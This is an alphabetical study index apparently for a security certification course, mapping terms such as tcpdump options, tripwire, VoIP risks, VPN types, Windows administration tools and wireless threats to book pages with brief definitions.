system restore snapshot                     5    76     available on XP and later; not available for Windows Server 2008
system restore win 7/vista                  5    77     includes changed data files and older copies of folders ("Previous Versions" tab)
system restore win xp                       5    77     registry settings, .ini configuration files, some OS files; doesn't restore user data files
system snapshot format                      5   307     section with labels, username and domain of who ran the script
system services section of GPO              5   194     in disable service, disable the World Wide Web Publishing service
system snapshot                             5   306     collection of data that documents the configuration and running state of a machine
system snapshot name                        5   307     computername_type_date
System Specific Policy                      2    71     specific for each system
system state                                5    71     includes registry, boot-up files, other files depending on what services are installed; schedule backup to run locally
TACACS (Terminal Access Controller Access Control System)   2   114   TCP based; Cisco proprietary version: TACACS+
take ownership right                    5   123   only admins by default
Tamper-proof                                4     8
targeted policy enforcement                 6   205     Fedora 10 enforces MCS with targeted policy enforcement
TCO of HIPS software                        3   234     additional burden of HIPS: needs more processing and possibly reduces your workstation lifecycle
tcp - (CWR) congestion window reduced   1   109   associated with protocol known as explicit congestion notification
tcp - (ECE) ECN Echo                    1   109
tcp - (fin) connection termination      1   111   graceful termination with fin,ack…abrupt closure rst/ack
tcp - aborted termination                   1   114     tcpdump from aborted termination, using the R flag
tcp - acknowledgement number                1   108     specifies the sequence number of the next byte the receiver expects
tcp - graceful termination                  1   113     tcpdump from graceful termination using FIN/ACK
tcp - initial sequence number               1   108     a random or semi-random value allowing reference to bytes in the packet
tcp - psh flag                              1   110     tells the receiver that a packet should not be buffered; telnet, SSH
tcp - urgent flag                           1   109     important data is located by the urgent pointer; it's up to the client to set it and up to the server to decide what to do with it; telnet, rlogin
Tcp common ports                        1    99    ftp 20,21 telnet 23 smtp 25 dns 53 finger 79 http 80 pop 110 https 443
tcp connection                              1   104     uses piggybacked packets a lot; sends many ACKs
TCP Finger-Printing                         3   117
tcp flags                                   1   106     in byte 13: URG, ACK, PSH, RST, SYN, FIN
tcp flags / code bits                       1   109     C, E, U, A, P, R, S, F
tcp full open                               3   128     default scan type for unprivileged users
tcp half open(syn scan)                 3   128
tcp header size                         1   105   normal size is 20 byte but if options used will be more than that
tcp header urgent                       1   164   like ctrl+c,tcp doesn't include the size of options
tcp options                                 1   106     maximum segment size, window scale, selective ACK, timestamp, no operation (NOOP)
tcp options size                        1   165   tcp header length-min tcp header length
tcp payload size                        1   166   total length of ip-(length of ip header+length of tcp header)
tcp port 3389                           5   256   Remote desktop protocol
tcp vs udp                              1   116   different address spaces for both udp and tcp
TCP/IP packet generation                1    47
tcpdump                                     1   138     free; unix version depends on libpcap, windump depends on winpcap; doesn't interpret events
tcpdump                                     6   191     one of the earliest sniffers; works on any OS talking TCP/IP; simple packet header analysis; can decode a few protocols such as NFS and DNS and show raw payload; filter and restrict what to view
tcpdump                                     6   192     can't decode application layer protocols except DNS, NFS
tcpdump 'tcp and port 1737'                 6   191     run tcpdump with a filter (put the filter in single quotes at the end of the tcpdump command line)
tcpdump -nnp                                6   191     tcpdump -p: don't put the interface into promiscuous mode
TCPDump as NIDS                         3   195
TCPDump as NIDS adv. & disadv.          3   196
tcpdump cmd                                 6   191     gives a one-line summary of each packet
tcpdump fields                              6   192     timestamp, ethernet packet type (ip), source ip address.source port, destination ip.destination port, flags other than ack ("."), acknowledgement number, window size and tcp options (between < >)
tcpdump icmp                                1   142     output format
tcpdump -ilo                                6   192     listen to the loopback interface (which is a fake network interface)
tcpdump -n                                  6   192     don't make any DNS lookups
tcpdump -nn                                 6   191     don't convert protocol and port numbers etc. to names either
tcpdump options                             1   139     -x hex output, -w write to file, -r read a file, -i specify the interface, -nn don't resolve IP and port, -s specify size of packets
tcpdump -r [.pcapfile]                      6   191     ignore your network interface and read packets from a saved capture file
tcpdump tcp                                 1   144     in the SYN packet establishing a connection there is no data inside the TCP segment
tcpdump udp                                 1   143     the bytes field in the output indicates the number of bytes in the UDP payload
tcpdump -v                                  6   192     verbose mode, so you can see the low-level negotiation through more details of the packet
tcpdump -w [filename]                       6   191     save the packets that tcpdump captures to disk
tcpdump -X                                  6   191     see the packet payload; you'll get the hexadecimal and mostly readable payload content
tcpwrapper                                  6   113,114 simply a utility that can be used for logging and intercepting TCP and UDP services started by inetd or xinetd; host-based network ACL system used to filter network access to Internet Protocol services on UNIX systems; can place a banner on any TCP or UDP service
tcpwrapper                                  6   114     acts as a proxy between the client and the real service connection; can monitor & filter SYSTAT, Finger, FTP, Telnet, Rlogin, Rsh, TFTP, Talk and …
tcpwrapper - After it?                      6   116     with tcpwrapper installed (as tcpd), all connections must pass through a set of rules before being allowed to connect to the service; checked at /etc/hosts.allow, /etc/hosts.deny
tcpwrapper - Before it?                     6   115     without a host-based firewall or ACL, access to a service is a direct connection
technet script center                       5     289   to get scripts
technical control                           3   262     technology-based solution; examples: firewall, IPS, anti-virus, etc.
Teredo                                      1    82     tunneling IPv6 over UDP through NAT
Terminal services                           5     253
termination agreement                       4     240   used to minimize the problems that a dismissed employee could make.
TFN                                         3    29     a DDoS agent
tfn2k                                       3    29     a DDoS agent
TFTP (trivial file transfer protocol)       1    94     used to transfer files from one device to another without authentication
Threat                                      2    11     primary threats: malware, insider, natural disasters, terrorism
threat                                      3   265     any event that can cause an undesirable outcome, or someone exploiting a weakness and compromising the system
threat concern                              3   100
threat suppression engine (tipping point)   3   253     patented tech for TippingPoint; uses parallel field programmable gate arrays (FPGA) and ASIC H/W to perform deep packet inspection
threat types                                3    99     worm, virus, employee emailing intellectual property to a computer
Threat Vectors                              3   275     outsider attacks (from network & telephone), insider attacks (local network & local system), malicious code
three-tier web application                  2   218     more secure; DiD concept
throughput                                  2   271     no. of items processed / time unit
thwart XSS attack                           5   187
TIME                                        6    65     ps output field; it is the time the process started running
Time domain reflectometer                   1    22     a good cable tester to check the compliance of cabling
time stamp and update sequence              5    32     in Active Directory on every object; if there is any conflict, the later change overrides the earlier
tipping point IPS                           3   253     an extra widget; can limit traffic to apply QoS, block applications like peer-to-peer
tipping point IPS -- response mechanisms    3   253     Notify, Report, Limit, Block
TKIP - Temporal Key Integrity Protocol      4   167     one of the 802.11i protocols; provides encryption, replay protection, integrity protection; works on the same WEP H/W chip
TLS - Handshake protocol                   4    81   which is used to negotiate the details of secure session
TLS - Record Protocol                      4    81   which is used to securely transfer application data
TLS (transport layer security)             2   234   provide encryption,identity verification,data integrity,use port 443
TLS(Transport layer security)              4   127   SSL Steps from client to server
Toc/Tou                                     3    38     time of check: check the security; time of use: service time; race condition attack
Token                                       1    13     a specialised frame carrying data
Token based Access control                  2   110     associates a list of objects (data) and their privileges with users
Token ring                                  1    13     allocated time; each machine has an equal time to communicate; data travel one way in a closed loop
Token ring communication                    1    13     an originating machine puts data into an empty token, then it goes to the destination until the originating machine empties the token again
Token web Authentication                   2   249
Token-based devices                        2   142   triggered by the time of the day
toneloc                                    3   153   free,can skip numbers, war dialing tool
touch                                      6   213   to create files or update timestamps
Toxic dampers                               1   226     ventilation systems are equipped with them to prevent toxic gas spreading through the ventilation system
toxins                                      1   225     radon and carbon monoxide; use specialized detectors
toxins threat                               1   225     use filtration masks, hermetically sealed vaults
TPM - Trusted privacy Module               4   121
TPM (Trusted Platform Module)               5   135     built into the motherboard; random number generation, cryptographic operations
TPM Management                              5   135
tpm owner password                          5   139     ASCII string, saved to a file, used only when managing the TPM
TPM turn on                                 5   134
TPM.msc                                     5   135
traceroute                                  1   125     unix uses UDP packets and Windows uses ICMP packets
traceroute, tracert                         1   124     increases the TTL value by 1 each time and checks the sender IP of the error "destination unreachable" or "time exceeded"
Tractable problem example                   4    51     easy problems that can be solved in polynomial time; the relation between the input size and the number of operations required to solve the problem is constant, linear, quadratic or cubic
traditional locks                      1   240   consist of metal lock and key,re-keying must be performed for all users
transaction oriented processing             5    89     to ensure that the file system is consistent in case of power failure or blue screen == transaction-oriented processing; use CHKDSK.exe
transitive trust                            5    42     the trust passes through a chain
transport layer                             1    43     handles the sequencing and provides reliable end-to-end connectivity
Transposition                               4    21     also called Permutation; changes the character's position, not the character itself
trap doors                                  3    28     bits of code embedded in programs by a programmer to gain access at a later time (backdoor)
trapdoor function & example                 4    28     a mathematical function which is easy to calculate and very difficult to invert, e.g. (multiplication & factorization) and (exponentiation & logarithms); used in Diffie-Hellman
trapdoor function & example                 4    50     allows a message to be decrypted using a different key than the one used to encrypt it; if the msg is encrypted by the public key, then the trapdoor is the private key
tcpwrapper                                  6   117     can also perform double-reverse IP address lookup, bannering system, additional logging capabilities
tcpwrapper                                  6   118     can alert the network admin of suspicious activity by sending SMS or mail to the admin
trinoo                                      3    29     a DDoS agent
Triple DES                                  4    61     latest release; can be configured to use either 2 or 3 unique keys: 112-bit (2 keys), 168 (3 keys)
Triple DES                                  4    61     executes 48 rounds (3 * 16 rounds)
TippingPoint                                2    45     tool that uses signatures and behavior to examine network traffic
tripwire                               3   220   is a file integrity check as a HIDS, & can react to changes to monitored files by restoring backup as a HIPS.
tripwire                                    6   171     intrusion detection through integrity checking; has 2 versions (commercial & open source); creates a secure db of file and dir attributes; can include MD5 signature for data verification
tripwire log file attribute                 6   172     access time, mod. time, size, inode creation time, content
tripwire -mc -v                             6   173     run tripwire in check phase with verbose output
tripwire -mi -v                             6   173     run tripwire in init phase (create db) with verbose output
tripwire perm and file mode attr            6   172     inode, no. of links, user, group
tripwire portable db                        6   171     tripwire creates a digital snapshot of files and/or dirs; the db should be maintained off-site and secure
tripwire steps                              6   173
Tripwire Sw                                 2    43     makes integrity check
trojan horses                               3    28     helpful, entertaining programs that perform actions the user didn't intend
true negative                               3   171     true OK; IDS doesn't generate an alarm for this
true positive                               3   171     true hacking
trust direction                             5    42     access to the resource goes in the opposite direction of the trust direction
trust nature                                5    41
Trust Relationship                          3     8     means I trust the information and connection that come from another familiar computer (doesn't require password)
trusted platform module intializatio        5   135     enable in BIOS, turn on Windows, then initialize Windows with the owner password
Trusted Sites Zone                          5   186     defines exceptions to permit dangerous features for URLs that you trust
tshark -i{interface}                        6   193     if you need to capture and decode the app. layer but don't have access to a graphical display; it displays one line per packet like tcpdump but gives the app layer decode that tcpdump generally won't
two-tier web application                    2   218     combines the presentation and application in one tier; for small business; difficult to secure
twprint -mr --twfile filename               6   173     read tripwire report
Type I, A error                             2   144     False Reject Rate, the percentage of legitimate users falsely rejected
Type II, B error                            2   145     False Accept Rate, the percentage of readings in which the system accepts an unauthorized user
UAC (User Account Control)                  5    11     to warn users when malware attempts to exercise their admin rights
ubuntu                                      6    19     Debian-based Linux; desktop & server; installs in 40 languages; supported archs (amd64, i386, ultrasparc, powerpc); APT (for package management); no GUI firewall and it isn't configured by default
ucredit=$                                   6    60     minimum no. of uppercase letters is $ in /etc/pam.d/system-auth in the pam_cracklib argument
UDP                                         1    92
udp checksum                                1    92     optional and not required; checks the data and header; not optional for IPv6
udp file transmission                       1    93     NetBIOS uses UDP to transfer local files
udp header                                  1    95     size = 8 bytes
udp multicast                               1    93     UDP is used for multicasting because TCP is hard to use in such environments
udp port numbers                            1    93     dns=53, bootp=67,68, tftp=69, ntp=123, nbt=(137-139), snmp=161 and 162, nfs=2049
udp scan                                    3   128     nmap relies on receiving ICMP messages; slower than TCP scans
Uniform protection                          2    15     all parts of the org receive equal protection; vulnerable to insiders; weakest
unauthorized access                         1   236     deterrent controls to prevent it using guards, signs, employee-only signs
unauthorized access - Detecting             1   243     CCTV, watch towers, motion detector, heat sensors
unauthorized access - Deterring             1   242     fences, X-ray scanners, metal detector, bag inspection
unauthorized access - Preventive            1   239
UNC (Universal Naming Convention)           5   104     full path to the network share
unity one product                           3   245     TippingPoint NIPS product; can handle >2gb throughput with latency less than one millisecond
universal group                             5    97     can contain members from any domain in the entire forest; can include user accounts == can have users from different domains
universal group (security)                  5   100     only available in AD native mode
unknown port                                3   125     a non-well-known port, so nmap can't tell what is running on it
unlock account (Linux)                      6    62
up2date                                     6   160     automatic update tool (Red Hat update agent)
up2date                                     6   166     GUI tool that uses rpm to install, upgrade, remove pkgs (Red Hat & Fedora)
update iso file                             5    60     Microsoft bundles the latest updates and patches in one single ISO file
update.msi                                  5    56     used by the built-in Windows Installer service on each machine to handle the installation process
UPS (uninterruptible power supply)          1   232     installed inline; sufficient power for (15-30) min
URL encoding                                2   228
URL Format                                  2   222     URL (<Protocol>://<Server name or address>/<Resource Name>)
urlscan.dll                                 5   245     free application firewall for IIS 5/6; scans HTTP requests and rejects bad requests
user account control                        5   179     how normal users could run SW with higher privileges; GPOs used to control it; standard & admin users; how to turn it off; how it works using user & process MIC labels; how to run as admin; standard user process: medium or low MIC label: SAT stripped of dangerous priv.; administrative user process: high or system MIC label: standard SAT for admin group member; UAC can be managed or turned off via group policy
user configurations /GPO                    5   153     applied to the current user desktop
user rights                                 5   118     general capability not tied to any object == rights for the user on the whole machine, not a specific object
user rights allow/deny user or group        5   122
user rights backup/restore                  5   124
user rights - managed by GPO                5   118     (local sec policy - local policy - user rig
user_r                                      6   202     all users assigned to that role
useradd                                     6    54     adds a user to the system and updates the /etc/passwd, /etc/shadow, /etc/group files
usermod -U                                  6    62     unlock account
usermod -L                                  6    62     lock account
utmp log                                    6   125     binary log file; keeps track of users currently logged in; used by (w, finger, who) commands; updated by the login program; world writable so it is inaccurate; /var/run/utmp
UTP                                         1    21
Validate                                    2   242
vampire tap                                 1    22     to see all traffic on coaxial without having to reconfigure the switch
VCI (Virtual Channel Id)                    1    16     associates cells with a virtual connection across an ATM network
Vector-Oriented DID                         2    18     threat requires a vector to cross the vuln, so shut it down; ex. USB, auto-answer modems, so disable them
vectors                                     3    99     outside attack, inside attack, attack from malicious code
ventilation exhaust systems                 1   225     they expel the air in areas served by air-conditioning, either naturally or by fans
Verisign                              4   115   a certification authority
VERITAS of backup Exec fame                69
Vertical markets of wireless          4   146   Healthcare, Financial, Academia, Factories/industrial, Retail, Wireless ISP
virtual machine application level           1   176     running an application on a VM will prevent attackers from attacking the host system
virtual machine os level                    1   176     like a Win VM; good because some tools don't work on a specific OS
virtual machine types                       1   181     Virtual PC from Microsoft, Parallels from Macintosh
virtualization                              1   174     general term for abstraction of resources to overcome the 1:1 relationship between OS and HW
virtualization platform                     1   174     taking a software platform and running multiple platforms on a single HW, like a virtual machine
virtualization resource                     1   175     to virtualize hardware like the database; each system is sharing the same HW but doesn't know that
Virus                                       2    21     malware able to replicate; is parasitic, it must attach to another program
Vlan                                        1    29     creates separate networks through software, not hardware
vmware ace capability                       1   187     ACE feature allows you to put a VM on a USB flash drive safely
vmware extensions                           1   182     .vmx VM configuration, .nvram VM BIOS, .vmdk VM disk file, .vmss suspended state file, .vmsn snapshot file
vmware fusion                               1   191     Unity feature allows you to run Windows applications on Mac
vmware player                               1   184     free; runs on Win, Linux; fully compatible
vmware workstation                                 1     186   ability to create snapshots,cloning,secure portability of vm
                                                               reporting statistic about RTP session including jittermpacket loss ….and can control flow of information between two
VOIP - real-time control protocol RTCP             4     220
                                                               VoIP
                                                               cost savings, voice compression: T1 support max 24 circuit switches conv with compressing it we bettter utilize BW
VOIP - advantages 1                                4   202-203
                                                               in packet
VOIP - advantages 2                                4   202-203 switched net, we can reduce BW from 64 kbps/call->6 kbps/call, new services"Click to Call", Location independence
VOIP - architecture=>                              4   208-209
VOIP - architecture=> IP PBX/PSTN intergration     4     208   all users utilize VoIP phone to connect to IP PBX and IP PBX connect with PSTN
                                                               PBX connected PSTN with VoIP.VoIP connect multible PBX together to provide connectivity to end-user with VoIP
VOIP - architecture=> PSTN PBX/VoIP intergration   4     208
                                                               phone
                                                               also known as "walled garden".VoIP network connect with another VoIP using hostname or IP for dialing instead of
VOIP - architecture=> pure VoIP networks           4     209
                                                               phone #
VOIP - architecture=> VoIP/PSTN ISP                4     209
VoIP - as a smart network                          4     203   provide possibility for new features & services
VoIP - call Hijacking                              4     228   where attacker takes over the identity of legimate user.
VOIP - call operation                              4     212   call setup next next directed connection through proxy server
VOIP - CID "Caller ID"                             4     217   CID (caller id info), included in the Msg header
VoIP - CID spoofing and privacy attack             4     226
VoIP - click-to-call                               4     203   click on URL of website to initiate call over VoIP network
                                                               Media gateways, Registration and Location server, Proxy servers, Message Servers, End-user device, VoIP
VOIP - components                                  4   210-211
                                                               phoones, FXS, soft phone
VoIP - configuration error                         4     198
VOIP - delay types                                 4     205   1-accumulation delay (algorithm delay). 2- proceding delay . 3- network delay
VoIP - disadantage => delay                        4     204   Echo , Talker overlap
VoIP - disadantage => echo compensation            4     206
VoIP - disadantage => jitter                       4     205
VoIP - disadantage => lost-packet compensation     4     205
VOIP - disadantage =>quality assurance challenge   4     204
VoIP - DoS vulnerability -SIP cancel               4     227   by sending SIP cancel.
VOIP - E911 location reporting                     4     224   couldn't determine the caller location for emergency purposes.
VoIP - External attacks                            4     197   DOS and external attacks
VoIP - impersonation                               4     226
VoIP - improper change management                  4     198
VoIP - Internal misuse                             4     197   sniffing voip traffic
VOIP - LAN                                         4     199   LAN is more reliable and faster than WAN
VoIP - limited HID                                 4     227
                                                               the firewall pass SIP to setup call then recipient answers the call, the RTP attemp to contact internal ip but stateful
VOIP - Nat challenges                              4     224
                                                               FW drop unless it does inspection
VOIP - operation challenge                    4   224
VoIP - packetized                             4   201
                                                        Signaling (H.323, SIP), Media (RTP), Supporting (necessary protocols to support VOIP signaling and media "TCP,
VOIP - protocols                              4   214
                                                        UDP, IP")
VoIP - provider taxation                      4   225   taxation due to losses caused to the telecom providers.
VOIP - quality concern                        4   224
VOIP - RTP "Real-time Transport Protocol"     4   220   used to transport packetized voice; end-to-end protocol, does not need to traverse a gateway server, commonly over UDP
VOIP - securing best practice                 4   229   1- audit the implementation to assess traffic patterns, 2- tunnel traffic with IPsec, 3- use firewalls that understand SIP/H.323, 4- monitor logging data, 5- isolate VoIP traffic on a dedicated channel
VOIP - security challenge                     4   226   CID spoofing, phone impersonation (limited strong auth. "weak PIN", SIP Digest dictionary attacks), DoS (SIP CANCEL), implementation attacks (vulnerabilities)
VoIP - service interruption                   4   198   due to network BW, QoS, power failure
VOIP - Signaling - ASN.1                      4   215   for specifying data; can be challenging to implement securely in a modular or "lightweight" fashion
VOIP - Signaling - H323                       4   215   provides both voice & video, uses UDP or TCP, standardized by the ITU and based on the ASN.1 "Abstract Syntax Notation" standard
VOIP - Signaling - H323                       4   215   is a set of protocols including: H.225, H.245, H.235, H.239
VOIP - SIP packet details                     4   217   all in ASCII strings; 1- request line (REGISTER, INVITE, ACK, CANCEL, BYE, OPTIONS), 2- message header, 3- message body (optional)
VOIP - SIP packet Exchange                    4   218   see diagram @ book
VOIP - SIP packet => message body             4   217   protocol negotiation details, encoding mechanism (for compression), IP address info.
VOIP - SIP packet => message header           4   217   information indicating the source and destination of the call, and caller identification information (CID)
VOIP - SIP (Session Initiation Protocol)      4   216   similar to HTTP's GET and POST methods; most implementations run SIP over UDP for performance; extensible
VOIP - source of delay                        4   205
VoIP - system malfunction                     4   198
VOIP - TCP vs UDP                             4   221   UDP is preferred for VoIP network because it has less overhead (smaller header size and no ack)
VoIP - theft                                  4   197
VOIP - traffic patterns                       4   212   call setup stream & voice stream; once the setup phase has completed, caller "Bob" creates a direct connection to recipient Alice to avoid latency
VOIP - Voip networking                        4   201   combines data and voice to extend voice over packet switching; the motivator for implementing it is ROI
VOIP - WAN                                    4   200   quality may vary significantly.
VOIP - wiretapping support                    4   225   eavesdropping
VOIP disadvantage=>reliability&availability   4   207
VOIP overview                                 4   196
VOIP risk(Key Risks)                          4   197   internal risk, internal misuse, theft, system malfunction, service interruption, config error, improper change management.
VoIP -SIP digest authentication attack        4   227   attacker sniffs the password hash & brute-forces it offline.
volume shadow copy system                   5    73     allows copying files that are open or locked
VPI (Virtual Path Id)                       1    16     VPI and VCI are used to route ATM cells between switches
VPN - advantage                             4   86-87   flexibility, lower cost than leased lines.
VPN - disadvantage                          4    88     IPS cannot examine the information in the message (because of encryption), therefore QoS for VPN is more difficult
VPN - GRE                                   4   101     to securely bridge any non-IP networks (IPX, AppleTalk) over an IP network
VPN - L2F                                   4   101
VPN - L2TP                                  4   102     to securely bridge dial-in users.
VPN - MPLS (multiprotocol label switching)  4    88     helps provide QoS over traditional IP service; QoS requires looking into the message to decide which message has high priority, but this can't be done with encryption (MPLS/VPN)
VPN - PPTP                                  4   101
VPN - Remote access type                    4    89     client to site , site to site , client to client
VPN - security problems                     4    90
VPN - Virtual private network               4    85
VPN => Client to client                     4    89     no longer used
VPN => Site - to - Site (tunnel)            4    89
VPN =>Client - to - site (transport)        4    89
vpn client software                         5   228     built into Windows, the VPN tunnel acts like an interface, supports smartcards, desktop logon via VPN
vpn interface                               5   228     like any regular interface for the VPN connection, desktop logon
vpn require pptpv2                          5   229
VSZ                                         6    65     in ps output; it is the process size
Vulnerabilities                             2    12     weakness in the system (known, unknown, zero-day)
vulnerability                               3   265     is a weakness in the system that can be exploited, or a weakness that could lead to system compromise
vulnerability analysis                      3   281     risk management step 3; newly discovered and old
vulnerability axioms                        3    98     5; vulnerabilities are gateways for threats; little scanning, little removing
vulnerability false positive                3   161     a subsequent pen test can verify where these false positives can be ignored
vulnerability scanners                      3   131     scan your own systems,scan,report
w command                                   6   126     uses the utmp log file; its output is: ( user, TTY, FROM, LOGIN@, IDLE, JCPU, PCPU, WHAT )
wan                                         1    7      large geographic area, uses public networks
wan aggregation                             1    18     it may be necessary to implement aggregation devices to support multiple WAN links and multiple WAN protocols.
WAN technologies                            1    17
war dialing                                 3   152     identifying systems with modems sitting inside the network
war dialing mitigating                      3   154     monitor call logs, use a honeypot, scan and take action
war driving                                 3   150     is driving with the equipment to detect wireless networks
Warfare and Terrorism                       2   200
Warfare affecting US Presidency             2   198
warrant                                     2   179
water/flood                                 1   227     detective controls: moisture/humidity sensors; corrective controls: bilge pump, evacuation
Wayback                            4   262   www.archive.org; this website takes snapshots of your website a few times a year.
wbadmin.exe                        5    73   2008 and later, optional, can copy locked files, backs up system state, volumes
Web architecture Hardening         2   220   separate data and logic from the presentation layer, FW & DMZ, server & DB hardening, HIDS, backup
web - configuration management     2   241   separate workplaces, version control system
web - Front page MS                2   250   has more vulnerabilities; can cause DoS
web - Performance testing          2   241   can withstand DoS
web - staging and deployment       2   241   before moving code to production a separate team must test it again
web - Version control              2   241   track changes to the code without overlap
web access control                 2   250   you must limit access to your web site; keep users out (default pages, code library, disable directory browsing, URL directory traversal)
Web application architecture       2   218
Web application Secure             2   240
Web Authentication                 2   247   HTTP authentication (basic mode, digest mode), form-based authentication
Web Authentication attack          2   248   brute force - account lockout; bypass authentication - check first user logged
Web communications                 2   217   stateless communication; retrieving info by GET, HEAD; sending info by POST, PUT
web- cracking tools                2   273   web browsers, Stunnel, Brutus, Achilles, Libwhisker, Nikto
webdav                             5   247   manages HTTP, can use SSL
webdav ,SMB                        5   126
webscarab                          2   278   proxy, HTTP, HTTPS, cookie analysis, session ID detection
Welchia                            3   118   Aug-03
WEP - security issues              4   165   weakness in the key scheduling algorithm of RC4; an attacker could recover the shared secret from nothing more than the encrypted data collected from the wireless network
WEP - tools attack                 4   166   WEPCrack, AirSnort, dwepcrack, wnet/reinj, wepwedgie
web application monitoring         2   270   file integrity (Tripwire), performance, logs. Types: defacement monitoring, availability monitoring, performance monitoring
web application service provider   2   244   SLE, patch audit every 6 months, vuln scan
web vulnerabilities                2   246
wfas                               5   211   Windows Firewall with Advanced Security; ICF (Internet Connection Firewall) is the old edition
wfas                               5   212   no support for automatic upload to a central server
WFAS block all connections         5   214   all inbound connections will be blocked even if there is a rule that allows them
WFAS log pfirewall.log             5   214   text file in W3C format, maximum log size is 32 MB
wfas rule processing               5   217   the best-matching rule wins
WFAS rules "firewall rules"        5   215   how to make a rule: "programs & services, users & computers, protocols & ports, scope"
wget.exe                           5   247   cmd HTTP client
Whisker                            2   275   vulnerability scanner, CGI vuln scan
White box test                     2   274   Code is open source
Whitelisting                       2   268   allow only necessary characters
who command                        6   125   used to display the UTMP log file.
whoami /all /fo list                  5    28   the names and SIDs of your groups and all your user rights (SAT)
whoami /priv                          5   118   can show your rights on the system
whoami.exe                            5   117
whoami.exe                            5   179
Whois DB                              4   260   gives you contact info [names, address, emails, phones], DNS server information
WIC                                   5   116
wids wireless ids                     3   207   wireless IDS, detects rogue access points
win firewall with advanced security   5    12   manageable through Group Policy and NETSH.exe
WinPcap                               3   195   packet capture for Windows (the capture program running on Windows is called WinDump)
windiff.exe                           5   315   GUI version of fc.exe, shows differences between files
Windows Mobile                        5    17   full operating system, RSA SecurID
Windows Mobile best practices         5    19   patching, backup
Windows Mobile hardening              5    17   centralized configuration management, anti-malware scanners, data encryption & access control
Windows Server 2003                   5    9    standard server, enterprise server, datacenter server
Windows Server 2003                   5    9    editions to provide scalability, fault tolerance, clustering, network load balancing
Windows Server 2003 R2                5    10   32-bit or 64-bit, Distributed File System, ADFS, ADAM
Windows Server 2003 web               5    9    supports two 32-bit CPUs, no more than 2 GB of RAM, can act as POP3, available for channel partners
Windows Server 2008                   5    14   standard and enterprise, supports 32/64-bit, includes Hyper-V support
Windows Server 2008 features          5    14   component modularization, server core, RODC, NAP, SSTP
Windows Server 2008 R2                5    16   Active Directory recycle bin, is 64-bit only, BranchCache
Windows Vista                         5    11   not an incremental upgrade to Windows XP; slow performance, backward compatibility issues
windows 7/2008/vista backup           5    72   Backup and Restore Center in Control Panel, not by location
windows and linux                     6    5    over 90% (93.4%) use Windows
windows event logs                    5   317   application, security, system, directory service for the Active Directory domain, DNS server; description field
windows event logs application logs   5   318   where OS applications and third-party tools write
windows firewall with advanced        5   211   WFAS; stateful firewall, can be managed through Group Policy and netsh.exe
windows management instrument         5   286   interface all scripts use to do things; also wmic.exe
Windows NT authen                     2   114   divides authentication into domains, makes trusts between them; authenticate once per session
windows os                            5    5    Windows XP SP2, Windows 2003
Windows password                      2   128   LAN Manager, 14 chars, broken into 7-char halves, no salt, all upper case
windows scripts                       5   286   ********3 pages ********
windows server resource kit           5   286   dozens of VBScripts
windows update service WUS            5    61   old version of WSUS
Windows xp home edition               5    6    can't join a domain, no GPO, no EFS, no dual-CPU support, no editable file system ACL
Windows xp sp2 features               5    7    Windows Firewall, improvements in Automatic Updates, Security Center applet, DEP
Windows xp sp3 features               5    8    credential roaming support, Wi-Fi Protected Access, Network Access Protection
windump                               6   191   tcpdump for Windows
windump -D                            6   197   lists long interface names and their shorthand numbers; this number can be used after -i
winpcap                               1   138
Winrtgen                              2   134   tool: GUI, generates rainbow tables that can be used in Cain (MD5, SHA, LanMan, NTLM)
wireless - network protecting                   4   190
wireless - denial of service                    4   183
wireless - denial of service(DoS) mitigation    4   185   prepare an appropriate response strategy and an IDS to react quickly against the attacker
wireless - eavesdropping                        4   179
wireless - eavesdropping mitigation             4   180
wireless - flaws in WiFi card firmware          4   184
wireless - general misconception                4   172
wireless - masquerading                         4   181
wireless - masquerading mitigation              4   182
wireless - masquerading - captive web           4   181
wireless - PEAP                                 4   182
wireless - risk misconception                   4   176
wireless - Rogue AP                             4   186
wireless - Rogue AP mitigation                  4   187
wireless - secure WLAN planning                 4   189
wireless - technical misconception              4   174
wireless - TTLS                                 4   182
Wireless advantage                              4   144
Wireless devices                                4   143   PDA, Mobile phones, Laptops, Pagers, HVAC control units.
wireless network mapping mitigation
wireless scanning                               3   145   passive or active,netstumbler or kismet
wireless - I do not need to worry about security 4   172
wireless-We don't have any wireless             4   172
wireshark &                                     6   193   runs Wireshark in the background so you can use the shell again.
wireshark analyze tool                          6   194   to see the app-layer conversation without headers, click on a TCP port 25 packet in the top window and choose "Follow TCP Stream" in the Analyze menu. A new popup shows the SMTP conversation (lines from server to client are blue and from client to server are red)
wireshark extracts                              6   193   it can extract just the TCP application-layer conversations, give packet counts by IP endpoint, and show Cisco IOS rules that would allow or block this traffic; you can also set advanced filters to look only for a particular conversation or traffic type
wireshark GUI benefits                          6   193   lets you maneuver around packets and headers; it also knows a great deal about the app-layer protocols, can decode the actual conversation and show you an app-layer summary, and provides tools to analyze the packets
wireshark session                               6   194   go to the Capture menu, choose Interfaces, pick any interface, then press Start
wireshark stop                                  6   194   return to the main window with packets summarized in the top third; when you click on any summary line, the protocol header of that packet shows up in the middle window and the hex decode of the packet shows up in the bottom window
WMI                                             5   137   windows management instrumentation,can write scripts for administritve tasks
wmi                                             5   286   windows management instrumentation,interface for scripts to use
wmic.exe                                5   277   wmic.exe <item> list full ******4 pages*******
wmic.exe /node:ip get servicepack       5   281   get the latest service pack installed on system
wmic.exe sysdriver list full            5   313   list the system drivers
wordlist mode                           2   126   no sorting; allows putting common words at the beginning of the list
workgroup                               5    21   Windows computers that share information in the absence of any domain controller
workgroup benefits                      5    23   simple, each PC protects itself, lower costs, each user is admin on his own PC
workgroup characteristics               5    21   no domain controllers
workgroup disadvantages                 5    24   no centralized management or auditing, no single sign-on, difficult to manage a large number of users
worm - Impacts                          2    26
worm toolkits                           3   117   non-programmers can make worms for any vulnerability
Worms                                   2    25   no need to attach to a program
Worms - configuration management        2    34
worms - Fix Worm                        2    33   patch, DiD, network partition
WPA - (Wi-Fi Protected Access)          4   170   the Wi-Fi Alliance adopted the AES-CCMP cipher mechanism designed for the new hardware
WPA2                                    4   170   results from the testing process for compliance with TKIP and AES-CCMP.
wrapping options                        5   327
WSB (windows server backup)             5    73   console snap-in, can't back up selected files, like wbadmin, copies locked files == on Server 2008 and later
wscript.exe \\server\script.vbs         5   295   causes the script to be downloaded and executed locally
WSH (Windows Script Host)               5   156   scripts can be written in any scripting language,interpreter
WSUS (windows server update services)   5    61   WSUS, 2000 or later, free, installs updates for different MS products, handles over 10000 PCs
wsus administration                     5    64
wsus work                               5    63   must run on IIS 6 or later; clients connect via HTTP or HTTPS; uses BITS
wtmp log                                6   123   binary log file that keeps track of logins and logouts, shutdowns and reboots (tracks intruder activities); similar to UTMP but grows in length and keeps historical data; because it is a binary file it is read with the last command (/var/log/wtmp); more info than lastlog
